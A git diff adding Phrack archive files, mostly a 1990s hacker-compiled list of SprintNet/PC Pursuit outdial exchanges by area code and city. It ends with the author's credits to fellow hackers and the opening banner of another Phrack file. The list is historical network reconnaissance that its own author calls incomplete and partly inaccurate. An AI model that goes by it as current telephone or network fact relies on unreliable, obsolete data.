+  612 MNMIN 471 472 473 474 475 476 477 478 479 481 482 483 484 487 488
+  612 MNMIN 489 490 491 492 493 494 496 497 498 499 520 521 522 526 527
+  612 MNMIN 529 533 534 535 536 537 538 540 541 542 544 545 546 552 553
+  612 MNMIN 557 559 560 561 566 569 571 572 574 588 591 593 620 621 622
+  612 MNMIN 623 624 625 626 627 631 633 635 636 638 639 640 641 642 643
+  612 MNMIN 644 645 646 647 648 649 653 663 667 673 681 683 687 688 690
+  612 MNMIN 696 698 699 720 721 722 723 724 725 726 727 728 729 730 731
+  612 MNMIN 733 735 736 737 738 739 741 750 753 754 755 757 770 771 772
+  612 MNMIN 774 776 777 778 779 780 781 782 784 785 786 788 789 822 823
+  612 MNMIN 824 825 827 828 829 830 831 832 835 851 853 854 858 861 863
+  612 MNMIN 865 866 867 868 869 870 871 872 874 879 881 884 885 887 888
+  612 MNMIN 890 891 892 893 894 895 896 897 920 921 922 924 925 926 927
+  612 MNMIN 929 931 932 933 934 935 936 937 938 939 941 942 944 949 976
+  612 MNMIN 977 989
+  816 MOKCI 221 223 224 225 228 229 231 234 241 242 243 245 246 247 251
+  816 MOKCI 252 254 257 274 275 276 283 292 322 331 333 346 348 353 356
+  816 MOKCI 358 361 363 373 374 391 395 421 426 435 436 444 452 453 454
+  816 MOKCI 455 459 461 464 466 468 471 472 474 478 483 497 521 523 524
+  816 MOKCI 525 531 532 537 556 561 572 576 578 587 589 591 654 698 734
+  816 MOKCI 737 741 743 751 753 756 757 759 761 763 765 767 781 792 795
+  816 MOKCI 796 821 822 833 836 842 844 854 861 871 881 891 921 922 923
+  816 MOKCI 924 926 931 932 941 942 943 966 968 995 997
+1 913 MOKCI 236 262 268 281 287 299 321 334 339 341 342 345 362 371 375
+1 913 MOKCI 381 383 384 422 432 441 451 469 491 492 541 551 573 574 576
+1 913 MOKCI 588 596 599 621 631 642 648 649 661 676 677 681 721 722 724
+1 913 MOKCI 764 780 782 787 788 791 829 831 888 894 897 962 967
+  314 MOSLO 225 227 231 232 233 234 235 241 247 253 259 261 263 268 275
+  314 MOSLO 277 289 291 296 298 321 331 342 343 344 349 351 352 353 355
+  314 MOSLO 361 362 367 371 381 382 383 385 388 389 391 394 421 423 424
+  314 MOSLO 425 426 427 428 429 432 434 436 441 444 454 458 464 466 469
+  314 MOSLO 476 481 487 489 521 522 523 524 525 529 531 532 533 534 535
+  314 MOSLO 538 539 541 542 544 551 553 554 567 569 571 572 576 577 578
+  314 MOSLO 595 621 622 623 631 638 644 645 647 652 653 658 664 671 677
+  314 MOSLO 679 694 721 725 726 727 731 739 741 746 747 752 755 758 768
+  314 MOSLO 771 772 773 776 777 781 791 795 821 822 823 826 829 831 832
+  314 MOSLO 836 837 838 839 841 842 843 845 846 848 849 851 854 855 862
+  314 MOSLO 863 865 867 868 869 871 872 878 879 889 891 892 894 895 899
+  314 MOSLO 921 928 938 939 941 942 946 947 949 957 961 962 963 965 966
+  314 MOSLO 968 969 973 982 984 991 992 993 994 997
+1 618 MOSLO 271 274 337 451 452 482 583 797
+  919 NCRTP 248 254 266 269 280 286 361 362 365 382 383 387 460 467 469
+  919 NCRTP 470 471 477 479 481 489 490 493 528 530 541 543 544 546 549
+  919 NCRTP 560 575 596 598 620 660 662 664 677 681 682 683 684 687 688
+  919 NCRTP 733 737 740 755 772 779 781 782 783 787 790 821 828 829 831
+  919 NCRTP 832 833 834 836 839 840 846 847 848 850 851 856 859 860 870
+  919 NCRTP 872 876 878 880 881 890 899 929 932 933 941 942 956 962 966
+  919 NCRTP 967 968 976 990 991 992
+  908 NJNBR 202 205 214 218 220 225 231 238 246 247 248 249 251 254 257
+  908 NJNBR 271 274 283 287 297 302 306 321 324 329 356 360 390 406 407
+  908 NJNBR 412 417 418 422 424 442 457 463 469 494 510 519 524 525 526
+  908 NJNBR 545 548 549 560 561 562 563 572 602 603 607 613 632 634 636
+  908 NJNBR 658 668 679 685 699 704 707 715 721 722 723 725 727 738 745
+  908 NJNBR 750 752 753 754 755 756 757 769 805 819 821 826 828 844 846
+  908 NJNBR 855 873 878 880 883 885 906 932 937 954 968 980 981 985
+  201 NJNEW 200 207 216 217 224 226 227 228 232 233 235 239 241 242 245
+  201 NJNEW 256 259 266 268 272 273 276 277 278 279 284 288 289 298 301
+  201 NJNEW 304 305 309 312 313 314 315 317 318 319 322 325 330 332 333
+  201 NJNEW 338 339 340 342 343 344 345 346 348 351 352 353 354 355 365
+  201 NJNEW 368 371 372 373 374 375 376 377 378 379 381 382 386 388 392
+  201 NJNEW 393 394 396 399 401 403 408 413 414 416 419 420 421 423 427
+  201 NJNEW 428 429 430 432 433 434 435 436 437 438 440 441 450 451 456
+  201 NJNEW 460 461 464 465 467 468 470 471 472 473 474 478 480 481 482
+  201 NJNEW 483 484 485 486 487 488 489 499 503 504 507 509 514 515 516
+  201 NJNEW 522 523 527 533 535 541 546 547 558 564 565 567 568 569 570
+  201 NJNEW 574 575 578 581 582 585 587 589 592 593 594 595 596 601 602
+  201 NJNEW 608 614 617 621 622 623 624 626 628 633 634 635 636 641 642
+  201 NJNEW 643 645 646 648 649 653 654 656 659 661 662 665 667 669 672
+  201 NJNEW 673 674 675 676 677 678 680 684 686 687 688 690 692 694 695
+  201 NJNEW 696 701 703 705 708 709 712 714 716 731 733 736 737 740 742
+  201 NJNEW 743 744 746 748 750 751 759 760 761 762 763 765 771 772 773
+  201 NJNEW 777 778 779 783 785 789 790 791 792 794 795 796 797 798 801
+  201 NJNEW 802 803 804 807 808 812 814 815 816 817 820 822 823 824 833
+  201 NJNEW 836 837 843 845 851 854 855 857 858 860 861 862 863 864 865
+  201 NJNEW 866 867 868 869 871 877 881 882 884 886 887 889 890 893 894
+  201 NJNEW 896 902 904 907 909 912 913 915 916 923 925 926 931 933 935
+  201 NJNEW 939 941 942 943 944 945 947 952 955 956 960 961 963 964 965
+  201 NJNEW 966 969 977 991 992 994 997 998
+1 908 NJNEW 200 232 233 241 245 272 273 276 277 289 298 317 322 351 352
+1 908 NJNEW 353 354 355 381 382 388 396 419 464 474 486 499 522 527 541
+1 908 NJNEW 558 574 582 594 602 634 636 654 665 686 687 688 709 737 750
+1 908 NJNEW 760 771 789 815 820 851 855 862 889 913 925 931 964 965 969
+  516 NYHEM 220 221 222 223 227 228 229 235 236 237 238 239 248 249 252
+  516 NYHEM 255 264 270 285 292 293 294 295 296 299 326 328 333 334 335
+  516 NYHEM 336 338 346 349 352 354 355 357 358 364 365 367 371 374 378
+  516 NYHEM 379 383 384 391 394 420 431 432 433 437 454 463 466 481 482
+  516 NYHEM 483 484 485 486 487 488 489 496 520 521 522 526 531 535 536
+  516 NYHEM 538 541 542 546 559 560 561 562 564 565 566 568 569 573 574
+  516 NYHEM 575 576 577 579 593 596 598 599 621 623 624 625 626 627 628
+  516 NYHEM 629 644 647 656 658 659 663 671 674 676 677 678 679 681 682
+  516 NYHEM 683 684 686 691 692 694 731 733 735 739 741 742 745 746 747
+  516 NYHEM 752 753 755 756 759 763 764 766 767 773 775 777 781 783 785
+  516 NYHEM 789 791 794 795 796 797 798 799 822 823 824 825 826 829 832
+  516 NYHEM 833 842 844 845 847 867 868 869 872 873 876 877 883 887 889
+  516 NYHEM 890 897 921 922 925 926 931 932 933 934 935 937 938 939 942
+  516 NYHEM 943 944 949 997
+  212 NYNYO 200 205 206 207 208 210 213 214 216 218 219 220 221 222 223
+  212 NYNYO 225 226 227 228 230 231 232 233 234 235 236 237 238 239 240
+  212 NYNYO 241 242 243 244 245 246 247 248 249 250 251 252 254 255 260
+  212 NYNYO 262 264 265 266 267 268 269 272 276 277 279 280 281 283 285
+  212 NYNYO 286 288 289 290 291 292 293 294 295 296 297 298 299 301 302
+  212 NYNYO 303 304 305 306 307 308 309 310 312 313 314 315 316 319 320
+  212 NYNYO 321 322 323 324 325 326 328 329 330 333 334 335 337 339 340
+  212 NYNYO 341 342 344 346 348 349 350 351 352 353 354 355 356 357 358
+  212 NYNYO 359 360 361 362 363 364 365 367 368 369 370 371 373 374 378
+  212 NYNYO 379 380 382 385 390 391 392 393 395 396 397 398 399 401 402
+  212 NYNYO 404 406 407 408 409 410 412 413 414 415 416 418 419 420 421
+  212 NYNYO 422 425 427 428 430 431 432 433 436 437 439 440 446 447 448
+  212 NYNYO 449 451 452 453 455 456 457 458 459 460 461 463 464 465 466
+  212 NYNYO 467 468 469 472 473 474 475 476 477 480 481 482 483 484 485
+  212 NYNYO 486 487 488 489 490 491 492 493 495 496 502 503 504 505 506
+  212 NYNYO 508 509 510 512 513 514 515 517 518 519 520 521 522 523 524
+  212 NYNYO 525 527 528 529 530 531 532 533 534 535 536 537 538 541 542
+  212 NYNYO 543 545 546 547 548 549 551 552 553 554 556 557 558 559 560
+  212 NYNYO 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575
+  212 NYNYO 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590
+  212 NYNYO 593 594 595 597 598 599 601 602 603 605 606 607 608 609 610
+  212 NYNYO 612 613 614 616 617 618 619 620 621 623 624 625 627 628 629
+  212 NYNYO 632 633 635 637 639 640 641 642 643 644 645 648 649 650 652
+  212 NYNYO 653 654 655 656 657 658 659 661 662 663 664 665 666 667 668
+  212 NYNYO 669 671 673 674 675 676 677 678 679 681 682 683 684 685 686
+  212 NYNYO 687 688 689 690 691 692 693 694 695 696 697 698 701 702 703
+  212 NYNYO 704 705 707 708 709 711 713 714 715 716 717 719 720 721 722
+  212 NYNYO 724 725 727 730 731 732 733 734 735 736 737 740 741 742 744
+  212 NYNYO 745 746 747 749 750 751 752 753 754 755 757 758 759 760 761
+  212 NYNYO 764 765 766 767 768 769 770 772 775 776 777 779 781 785 786
+  212 NYNYO 787 790 791 792 793 794 795 796 797 798 799 804 806 807 808
+  212 NYNYO 809 812 813 815 818 819 820 822 823 824 825 826 827 828 829
+  212 NYNYO 830 831 832 836 837 838 839 840 841 842 844 847 848 850 852
+  212 NYNYO 853 854 855 856 858 860 861 862 863 864 865 866 867 868 869
+  212 NYNYO 870 871 872 873 874 876 877 878 879 880 881 882 883 884 885
+  212 NYNYO 886 887 888 889 891 892 893 898 899 901 902 903 904 905 906
+  212 NYNYO 907 908 909 912 916 918 920 921 922 923 924 925 926 927 928
+  212 NYNYO 929 930 931 932 933 935 936 938 940 941 942 943 944 945 947
+  212 NYNYO 949 951 952 953 954 955 956 957 960 962 963 964 966 967 968
+  212 NYNYO 969 971 972 973 974 975 977 978 979 980 982 983 984 985 986
+  212 NYNYO 988 989 991 992 993 994 995 996 997 998 999
+1 516 NYNYO 221 222 223 227 228 229 235 236 237 238 239 248 249 252 255
+1 516 NYNYO 264 270 285 292 293 294 295 296 299 326 328 333 334 336 338
+1 516 NYNYO 346 349 352 354 357 358 364 365 367 371 374 378 379 391 420
+1 516 NYNYO 431 432 433 437 454 463 466 481 482 483 484 485 486 487 488
+1 516 NYNYO 489 496 520 521 526 531 535 536 538 541 542 546 559 560 561
+1 516 NYNYO 562 564 565 566 568 569 574 575 576 577 579 593 596 598 599
+1 516 NYNYO 621 623 624 625 626 627 628 629 644 647 656 658 663 671 674
+1 516 NYNYO 676 677 678 679 681 682 683 684 686 691 692 694 731 733 735
+1 516 NYNYO 739 741 742 745 746 747 752 753 755 756 759 763 764 766 767
+1 516 NYNYO 773 775 781 783 785 789 791 794 795 796 797 798 799 822 823
+1 516 NYNYO 824 825 826 829 832 842 844 845 847 867 868 869 872 873 876
+1 516 NYNYO 877 883 887 889 890 897 921 922 926 931 932 933 934 935 937
+1 516 NYNYO 938 939 942 943 944 949 997
+1 718 NYNYO 200 204 209 217 221 224 225 229 230 232 233 234 235 236 237
+1 718 NYNYO 238 240 241 244 247 248 251 252 253 256 257 258 259 260 261
+1 718 NYNYO 262 263 265 266 267 268 270 271 272 273 274 275 276 277 278
+1 718 NYNYO 279 282 284 287 291 296 297 317 318 321 322 326 327 330 331
+1 718 NYNYO 332 335 336 337 338 339 341 342 343 345 346 347 349 351 352
+1 718 NYNYO 353 354 356 357 358 359 360 361 363 366 370 372 373 375 376
+1 718 NYNYO 377 380 381 383 384 385 386 387 388 389 390 392 395 397 398
+1 718 NYNYO 403 417 421 423 424 426 428 429 434 435 436 438 439 441 442
+1 718 NYNYO 443 444 445 446 447 448 449 451 452 453 454 455 456 457 458
+1 718 NYNYO 459 461 462 463 464 465 467 468 469 470 471 474 476 478 479
+1 718 NYNYO 480 481 482 485 486 489 492 493 494 495 497 498 499 507 520
+1 718 NYNYO 522 523 525 526 527 528 529 531 533 539 541 544 545 552 557
+1 718 NYNYO 565 571 574 575 591 592 596 599 604 615 622 624 625 626 627
+1 718 NYNYO 628 629 630 631 632 633 634 636 638 639 641 642 643 644 645
+1 718 NYNYO 646 647 648 649 651 656 657 658 659 667 670 672 680 692 693
+1 718 NYNYO 694 698 699 706 712 720 721 723 726 727 728 729 735 738 739
+1 718 NYNYO 740 743 745 746 748 754 755 756 760 761 762 763 764 767 768
+1 718 NYNYO 769 771 773 774 776 778 779 780 782 783 784 786 788 789 793
+1 718 NYNYO 797 802 803 805 816 821 826 827 830 831 832 833 834 835 836
+1 718 NYNYO 837 843 845 846 847 848 849 851 852 853 854 855 856 857 858
+1 718 NYNYO 859 868 871 875 876 883 886 891 894 895 896 897 898 899 917
+1 718 NYNYO 919 921 922 927 932 934 935 937 938 939 941 942 945 946 948
+1 718 NYNYO 949 951 953 955 956 961 962 963 965 966 967 968 969 972 977
+1 718 NYNYO 978 979 981 983 984 987 990 995 996 997 998 999
+1 914 NYNYO 235 237 251 253 270 282 285 286 287 288 289 321 328 332 333
+1 914 NYNYO 335 337 345 347 375 376 378 381 390 391 395 397 422 423 428
+1 914 NYNYO 472 476 478 523 524 576 591 592 631 632 633 636 641 642 644
+1 914 NYNYO 654 662 664 665 667 668 674 681 682 683 684 686 693 694 696
+1 914 NYNYO 697 698 699 721 723 725 738 761 768 771 776 779 784 789 792
+1 914 NYNYO 793 833 834 835 899 921 925 933 934 935 937 939 946 948 949
+1 914 NYNYO 961 963 964 965 967 968 969 993 997
+  216 OHCLE 221 226 228 229 231 232 234 235 236 237 238 241 243 247 248
+  216 OHCLE 249 251 252 261 265 266 267 268 271 278 281 283 289 291 292
+  216 OHCLE 295 299 321 328 331 333 338 341 344 348 349 351 356 361 362
+  216 OHCLE 363 368 371 381 382 383 389 391 397 398 421 423 425 429 431
+  216 OHCLE 432 433 439 441 442 443 444 445 446 447 449 451 459 461 463
+  216 OHCLE 464 467 468 469 471 473 475 476 479 481 486 487 491 521 522
+  216 OHCLE 523 524 526 529 531 541 543 561 562 566 572 574 575 578 579
+  216 OHCLE 581 582 585 586 587 589 591 621 622 623 631 634 641 642 646
+  216 OHCLE 651 656 659 661 662 663 664 671 676 681 687 689 691 692 694
+  216 OHCLE 696 721 728 729 731 732 734 736 737 741 749 751 752 754 761
+  216 OHCLE 765 766 771 777 779 781 789 791 795 822 826 831 835 838 842
+  216 OHCLE 843 844 845 851 861 871 881 883 884 885 886 888 891 892 899
+  216 OHCLE 921 931 932 941 942 943 944 946 951 953 961 975 987 991 995
+  614 OHCOL 221 222 223 224 225 227 228 229 231 235 236 237 238 239 243
+  614 OHCOL 248 249 251 252 253 258 261 262 263 265 267 268 271 272 274
+  614 OHCOL 275 276 278 279 281 288 291 292 293 294 296 297 299 325 329
+  614 OHCOL 337 338 341 351 361 365 371 395 421 424 431 433 436 438 442
+  614 OHCOL 443 444 445 447 451 457 459 460 461 462 463 464 466 469 471
+  614 OHCOL 475 476 478 479 481 486 487 488 491 492 497 523 538 548 575
+  614 OHCOL 621 644 645 752 755 756 759 761 764 766 771 777 785 786 791
+  614 OHCOL 792 793 794 821 833 836 837 841 842 846 847 848 851 852 855
+  614 OHCOL 860 861 863 864 866 868 870 871 875 876 877 878 879 881 882
+  614 OHCOL 885 888 889 890 891 895 898 899 927 964 965
+  503 ORPOR 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234
+  503 ORPOR 235 236 237 238 239 240 241 242 243 244 245 246 248 249 250
+  503 ORPOR 251 252 253 254 255 256 257 273 274 275 279 280 281 282 283
+  503 ORPOR 284 285 286 287 288 289 291 292 293 294 295 297 299 323 324
+  503 ORPOR 326 335 357 359 452 464 526 591 620 621 624 625 626 627 628
+  503 ORPOR 629 630 631 632 635 636 637 638 639 640 641 642 643 644 645
+  503 ORPOR 646 647 648 649 650 652 653 654 655 656 657 658 659 661 663
+  503 ORPOR 665 666 667 668 669 677 681 682 684 685 690 691 692 693 694
+  503 ORPOR 695 696 697 698 721 731 733 760 761 771 774 775 777 778 781
+  503 ORPOR 789 790 796 936 976 985
+  215 PAPHI 221 222 223 224 225 226 227 228 229 231 232 233 235 236 237
+  215 PAPHI 238 241 242 243 244 245 246 247 248 254 259 260 263 265 270
+  215 PAPHI 271 272 275 276 277 278 279 280 281 283 284 288 289 291 293
+  215 PAPHI 299 324 328 329 330 331 332 333 334 335 336 337 338 339 341
+  215 PAPHI 342 349 350 351 352 353 354 356 359 365 379 382 386 387 389
+  215 PAPHI 422 423 424 425 426 427 438 440 446 447 448 449 450 452 455
+  215 PAPHI 456 457 460 461 462 463 464 465 466 467 468 470 471 472 473
+  215 PAPHI 474 476 477 480 482 483 485 487 490 492 494 496 497 499 520
+  215 PAPHI 521 522 523 525 526 527 528 531 532 533 534 535 537 539 540
+  215 PAPHI 542 543 544 545 546 548 549 551 552 553 557 560 561 563 564
+  215 PAPHI 565 566 567 568 569 570 572 573 574 576 577 578 580 581 583
+  215 PAPHI 585 586 587 590 591 592 595 596 597 620 621 622 623 624 625
+  215 PAPHI 626 627 628 629 630 631 632 634 635 636 637 638 639 641 642
+  215 PAPHI 643 645 646 649 653 657 659 660 662 663 664 665 667 668 671
+  215 PAPHI 673 676 677 680 684 685 686 687 688 690 697 698 722 724 725
+  215 PAPHI 726 727 728 729 732 734 735 737 739 742 743 744 745 747 748
+  215 PAPHI 751 753 755 761 763 765 768 769 782 784 786 787 789 790 823
+  215 PAPHI 824 825 828 829 830 831 833 834 835 836 839 840 841 842 843
+  215 PAPHI 844 846 848 849 851 853 854 864 870 871 872 874 875 876 877
+  215 PAPHI 878 879 880 881 884 885 886 887 891 892 893 894 895 896 897
+  215 PAPHI 898 899 920 922 923 924 925 927 928 930 931 934 936 937 938
+  215 PAPHI 940 941 947 951 952 955 960 961 962 963 964 969 971 972 973
+  215 PAPHI 975 977 978 980 981 985 986 988 990 991 998
+  412 PAPIT 200 221 227 231 232 234 236 237 241 242 243 244 247 255 256
+  412 PAPIT 257 261 262 263 264 268 269 271 273 276 279 281 288 298 321
+  412 PAPIT 322 323 328 331 333 338 341 343 344 351 355 359 361 362 363
+  412 PAPIT 364 365 366 367 369 371 372 373 374 381 389 391 392 393 394
+  412 PAPIT 421 422 427 429 431 433 434 441 442 456 461 462 464 466 469
+  412 PAPIT 471 472 476 481 486 487 488 491 492 497 521 531 551 553 561
+  412 PAPIT 562 563 565 566 571 572 578 594 621 622 623 624 633 636 642
+  412 PAPIT 644 645 647 648 653 655 661 664 665 672 673 674 675 678 681
+  412 PAPIT 682 683 687 692 699 731 734 741 747 749 751 754 761 762 765
+  412 PAPIT 766 767 771 777 778 781 782 784 787 788 793 795 798 821 822
+  412 PAPIT 823 824 825 826 828 829 831 833 835 840 854 855 856 858 859
+  412 PAPIT 881 882 884 885 889 892 921 922 923 928 931 936 937 939 961
+  412 PAPIT 963 967
+1 601 TNMEM 342 349 393 781 851
+  901 TNMEM 227 272 274 276 278 320 323 324 325 327 332 344 345 346 348
+  901 TNMEM 353 357 358 360 362 363 365 366 367 368 369 371 372 373 375
+  901 TNMEM 377 382 385 386 387 388 395 396 397 398 452 454 458 465 475
+  901 TNMEM 476 483 484 485 486 521 522 523 524 525 526 527 528 529 531
+  901 TNMEM 532 533 535 543 544 572 575 576 577 578 579 597 654 678 681
+  901 TNMEM 682 683 684 685 721 722 725 726 728 729 743 744 745 747 748
+  901 TNMEM 752 753 754 755 756 757 758 761 762 763 765 766 767 774 775
+  901 TNMEM 785 789 794 795 797 829 853 854 867 872 873 876 877 922 942
+  901 TNMEM 946 947 948 976
+  512 TXAUS 218 219 243 244 247 250 251 255 258 259 261 263 264 266 267
+  512 TXAUS 272 276 280 282 288 292 320 322 323 326 327 328 329 331 335
+  512 TXAUS 338 339 343 345 346 356 369 370 371 385 386 388 389 390 397
+  512 TXAUS 403 416 422 440 441 442 443 444 445 447 448 450 451 452 453
+  512 TXAUS 454 458 459 461 462 463 465 467 469 471 472 473 474 475 476
+  512 TXAUS 477 478 479 480 482 483 495 499 750 794 823 832 834 835 836
+  512 TXAUS 837 838 860 867 870 873 891 892 926 928 929 940 941 973 984
+  512 TXAUS 990
+  214 TXDAL 202 203 204 205 212 216 217 218 219 220 221 222 223 224 225
+  214 TXDAL 226 227 228 229 230 231 233 234 235 238 239 240 241 242 243
+  214 TXDAL 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258
+  214 TXDAL 259 260 262 263 264 266 269 270 271 272 275 276 278 279 281
+  214 TXDAL 284 285 286 287 288 289 290 291 293 296 298 299 301 302 303
+  214 TXDAL 305 306 307 308 309 313 314 315 316 317 318 319 320 321 323
+  214 TXDAL 324 327 328 330 331 332 333 336 337 339 340 341 343 348 349
+  214 TXDAL 350 351 352 353 357 358 360 361 363 368 369 371 372 373 374
+  214 TXDAL 375 376 380 381 384 385 386 387 388 391 392 393 394 397 398
+  214 TXDAL 399 401 402 403 404 406 407 412 413 414 416 417 418 420 421
+  214 TXDAL 422 423 424 426 428 434 436 437 438 441 442 443 444 445 446
+  214 TXDAL 450 453 456 458 462 464 466 470 471 475 480 484 487 490 492
+  214 TXDAL 494 495 497 502 503 504 506 508 513 514 516 517 518 519 520
+  214 TXDAL 521 522 526 528 530 533 539 541 550 553 554 556 557 558 559
+  214 TXDAL 565 570 573 574 575 578 579 580 590 591 594 596 601 602 603
+  214 TXDAL 604 605 606 607 608 609 612 613 615 616 618 620 621 630 631
+  214 TXDAL 634 637 638 641 642 644 647 650 651 653 655 658 659 660 661
+  214 TXDAL 669 670 676 680 681 686 688 689 690 691 692 696 698 699 701
+  214 TXDAL 702 704 705 706 707 708 709 712 713 714 715 716 717 718 720
+  214 TXDAL 721 724 727 733 739 740 741 742 744 745 746 747 748 749 750
+  214 TXDAL 751 754 760 761 767 770 771 780 781 783 787 788 790 791 799
+  214 TXDAL 804 808 812 815 818 819 820 821 823 824 826 827 828 830 840
+  214 TXDAL 841 844 850 851 855 864 867 869 871 879 880 881 888 890 891
+  214 TXDAL 902 904 905 907 909 913 917 918 919 920 922 929 931 933 934
+  214 TXDAL 939 941 942 943 944 946 948 949 951 952 953 954 956 957 960
+  214 TXDAL 964 969 977 978 979 980 985 986 987 988 991 992 993 995 996
+  214 TXDAL 997 999
+1 817 TXDAL 261 265 267 268 273 329 355 356 366 379 421 424 425 429 430
+1 817 TXDAL 432 449 450 461 467 469 475 477 481 498 530 540 543 572 577
+1 817 TXDAL 588 589 640 654 667 671 679 695 784 792 832 856 884 890 922
+1 817 TXDAL 925 929 930 961 962 963 967
+  713 TXHOU 200 220 221 222 223 224 225 226 227 228 229 230 233 235 236
+  713 TXHOU 237 238 240 241 242 244 246 247 252 253 254 261 263 264 265
+  713 TXHOU 266 267 268 269 270 271 272 274 277 278 280 282 283 284 285
+  713 TXHOU 286 287 289 293 295 320 324 326 328 331 332 333 334 335 336
+  713 TXHOU 337 338 339 341 342 343 346 347 350 351 353 354 355 356 358
+  713 TXHOU 359 360 363 364 367 370 371 373 374 376 377 378 383 388 390
+  713 TXHOU 391 392 393 394 395 420 421 422 424 425 426 427 428 431 432
+  713 TXHOU 433 434 436 437 438 439 440 441 442 443 444 445 446 447 448
+  713 TXHOU 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463
+  713 TXHOU 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478
+  713 TXHOU 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493
+  713 TXHOU 494 495 496 497 498 499 520 521 522 523 524 525 526 527 528
+  713 TXHOU 529 530 531 535 536 537 540 541 542 546 547 548 549 550 551
+  713 TXHOU 552 556 558 561 563 565 568 571 575 577 578 579 580 583 584
+  713 TXHOU 586 587 588 589 590 591 596 599 620 621 622 623 626 627 629
+  713 TXHOU 630 631 633 635 636 639 640 641 643 644 645 649 650 651 652
+  713 TXHOU 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667
+  713 TXHOU 668 669 670 671 672 673 674 675 676 678 679 680 681 682 683
+  713 TXHOU 684 685 686 688 690 691 692 694 695 696 697 699 720 721 723
+  713 TXHOU 726 728 729 731 732 733 734 738 739 741 744 746 747 748 749
+  713 TXHOU 750 751 752 753 754 757 758 759 761 762 763 764 765 768 769
+  713 TXHOU 771 772 774 775 776 777 778 779 780 781 782 783 784 785 786
+  713 TXHOU 787 788 789 790 791 792 793 794 795 796 797 798 799 820 821
+  713 TXHOU 822 823 824 825 826 827 828 829 831 833 834 835 836 840 841
+  713 TXHOU 842 844 845 846 847 850 852 853 854 855 856 857 858 859 861
+  713 TXHOU 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876
+  713 TXHOU 877 878 879 880 882 883 884 886 888 890 891 892 893 894 895
+  713 TXHOU 896 897 898 899 920 921 922 923 924 926 928 929 930 931 932
+  713 TXHOU 933 935 937 938 939 940 941 943 944 946 947 948 951 952 953
+  713 TXHOU 954 955 956 957 960 961 963 964 965 966 967 968 969 971 972
+  713 TXHOU 973 974 975 977 978 980 981 983 984 985 986 987 988 989 991
+  713 TXHOU 992 993 995 996 997 998 999
+  801 UTSLC 220 237 240 250 251 252 254 255 261 262 263 264 265 266 268
+  801 UTSLC 269 272 273 277 278 287 292 295 298 299 321 322 328 350 355
+  801 UTSLC 359 363 364 366 451 460 461 466 467 468 480 481 482 483 484
+  801 UTSLC 485 486 487 488 521 522 524 526 530 531 532 533 534 535 536
+  801 UTSLC 537 538 539 543 544 546 547 549 561 562 565 566 569 570 571
+  801 UTSLC 572 573 575 576 578 579 580 581 582 583 584 585 588 594 595
+  801 UTSLC 596 633 799 933 942 943 944 947 964 965 966 967 968 969 972
+  801 UTSLC 973 974 975 977
+  206 WASEA 223 224 226 227 228 232 233 234 235 236 237 241 242 243 244
+  206 WASEA 246 248 251 255 271 277 281 282 283 284 285 286 287 292 296
+  206 WASEA 298 320 322 323 324 325 326 328 329 340 343 344 345 346 358
+  206 WASEA 361 362 363 364 365 367 368 382 386 389 391 392 393 394 395
+  206 WASEA 421 431 432 433 439 441 442 443 447 448 451 453 454 455 461
+  206 WASEA 462 464 467 477 481 483 485 486 487 488 489 522 523 524 525
+  206 WASEA 526 527 528 542 543 544 545 546 547 548 554 557 562 575 583
+  206 WASEA 585 587 621 622 623 624 625 626 628 630 631 632 633 634 635
+  206 WASEA 637 639 641 643 644 646 649 654 655 656 657 661 662 667 670
+  206 WASEA 672 682 684 685 720 721 722 723 725 726 727 728 742 743 744
+  206 WASEA 745 746 747 762 763 764 767 768 771 772 773 774 775 776 778
+  206 WASEA 781 782 783 784 787 788 789 820 821 822 823 824 827 828 836
+  206 WASEA 838 839 842 850 852 854 859 861 865 867 868 869 870 872 874
+  206 WASEA 878 880 881 882 883 885 889 930 932 933 935 936 937 938 940
+  206 WASEA 941 946 947 948 949 953 954 955 965 969 972 977 979 982 986
+  206 WASEA 989 991 993 994 995 996 997 998 999
+  414 WIMIL 221 222 223 224 225 226 227 228 229 237 241 242 243 246 251
+  414 WIMIL 252 253 254 255 256 257 258 259 263 264 265 266 271 272 273
+  414 WIMIL 274 276 277 278 281 282 283 287 288 289 291 297 298 299 321
+  414 WIMIL 322 323 327 332 341 342 343 344 345 347 351 352 353 354 355
+  414 WIMIL 357 358 359 362 365 367 372 374 375 377 382 383 384 385 421
+  414 WIMIL 422 423 425 427 438 442 444 445 447 449 453 454 461 462 463
+  414 WIMIL 464 466 471 475 476 481 482 483 486 491 521 523 524 527 529
+  414 WIMIL 535 536 538 541 542 543 544 545 546 547 548 549 562 575 579
+  414 WIMIL 581 643 645 647 649 662 663 671 672 678 679 691 744 747 761
+  414 WIMIL 762 764 765 768 769 771 774 778 781 782 783 784 785 786 789
+  414 WIMIL 791 792 796 797 798 799 821 835 844 871 873 874 881 896 931
+  414 WIMIL 933 935 936 937 941 955 961 962 963 964 966
+
+Conclusion
+----------
+
+I could hardly take credit for scanning and finding the NUAs that make
+make up this list.  I put this list together because the lists I've seen
+in the past were either partially incomplete or partially incorrect.  A
+list put out by OpusWiz and Dawn Treader several years ago served as the
+base data for this list.  I've spoken to many many hackers over the years
+to add to and correct the list.  Erik Bloodaxe's Telenet Directory,
+published in the Legion of Doom Technical Journals, was of great help in
+clarifying and adding to the data.
+
+The list is still neither complete or fully accurate.  For example, I still
+don't know the outdials for San Diego, California (619).  The 415 and 714
+outdials might be mixed up.  If you have any additions or corrections, please
+e/mail one of my Internet accounts.
+
+By the way, the new 510 area code will have an impact on the PC Pursuit
+dialout list.  SprintNet hasn't incorporated the new area code into its
+lists yet, so I haven't either.  But they will soon, so be aware that the
+Oakland, California dialout will change from area code 415 to 510 someday.
+_____________________________________________________________________________
diff --git a/phrack35/5.txt b/phrack35/5.txt
new file mode 100644
index 0000000..b78b50b
--- /dev/null
+++ b/phrack35/5.txt
@@ -0,0 +1,285 @@
+                               == Phrack Inc. ==
+
+                 Volume Three, Issue Thirty-five, File 5 of 13
+
+        ______________________________________________________________
+      ||                                                              ||
+      ||  Don't let THIS happen to you!                               ||
+      ||                                                              ||
+      ||           __________                                         ||
+      ||     Heh  |          |/No life, no future...                  ||
+      ||    /Heh! |          0                         H S L Q I F X  ||
+      ||   O      |        --|--                                      ||
+      || --|--    |         / \                                       ||
